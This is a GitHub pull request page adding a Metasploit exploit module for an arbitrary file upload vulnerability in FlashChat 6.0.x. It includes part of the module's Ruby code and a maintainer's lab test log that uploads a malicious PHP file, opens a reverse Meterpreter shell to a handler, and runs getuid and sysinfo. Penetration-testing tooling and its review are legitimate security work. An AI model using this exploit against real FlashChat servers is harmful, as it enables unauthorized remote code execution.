Add FlashChat Arbitrary File Upload exploit module #2469

Merged
merged 1 commit into from Oct 5, 2013

Projects

None yet

2 participants

@bcoles
Contributor
bcoles commented Oct 5, 2013

Add FlashChat Arbitrary File Upload exploit module.

Add FlashChat Arbitrary File Upload

@jvazquez-r7 jvazquez-r7 commented on the diff Oct 5, 2013
modules/exploits/unix/webapp/flashchat_upload_exec.rb
+
+ register_options(
+ [
+ OptString.new('TARGETURI', [true, 'The base path to FlashChat', '/chat/'])
+ ], self.class)
+ end
+
+ #
+ # Checks if target is running FlashChat versions 6.0.2, 6.0.4 to 6.0.8
+ #
+ def check
+ uri = normalize_uri(target_uri.path, '')
+ res = send_request_raw({'uri' => uri})
+
+ if not res
+ print_error("#{peer} - Connection timed out")
@jvazquez-r7
jvazquez-r7 Oct 5, 2013 Contributor

Please use fail_with instead of print_error / return

@jvazquez-r7
jvazquez-r7 Oct 5, 2013 Contributor

Forget the comment above, it is check :)

@jvazquez-r7 jvazquez-r7 pushed a commit that referenced this pull request Oct 5, 2013
jvazquez-r7 Land #2469, @bcoles exploit for FlashChat 875e086
@jvazquez-r7 jvazquez-r7 merged commit 08243b2 into rapid7:master Oct 5, 2013

1 check passed

default The Travis CI build passed
Details
@jvazquez-r7
Contributor

Landed after minor cleanup available here: 24efb55

Test (exploit and check) (after cleanup):

msf exploit(flashchat_upload_exec) > set rhost 192.168.172.133
rhost => 192.168.172.133
msf exploit(flashchat_upload_exec) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.172.1:4444 
[*] 192.168.172.133:80 - Uploading malicious file...
[*] 192.168.172.133:80 - Executing C9IzBWHgLOBd.php...
[*] Sending stage (39195 bytes) to 192.168.172.133
[*] Meterpreter session 1 opened (192.168.172.1:4444 -> 192.168.172.133:48602) at 2013-10-05 14:50:20 -0500
[+] Deleted C9IzBWHgLOBd.php

^C[-] Exploit failed: Interrupt 

meterpreter > getuid
Server username: www-data (33)
meterpreter > sysinfo
Computer    : ubuntu
OS          : Linux ubuntu 2.6.32-38-generic #83-Ubuntu SMP Wed Jan 4 11:13:04 UTC 2012 i686
Meterpreter : php/php
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.172.133 - Meterpreter session 1 closed.  Reason: User exit
msf exploit(flashchat_upload_exec) > check

[*] 192.168.172.133:80 - Version found: 6.0.8
[+] The target is vulnerable.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment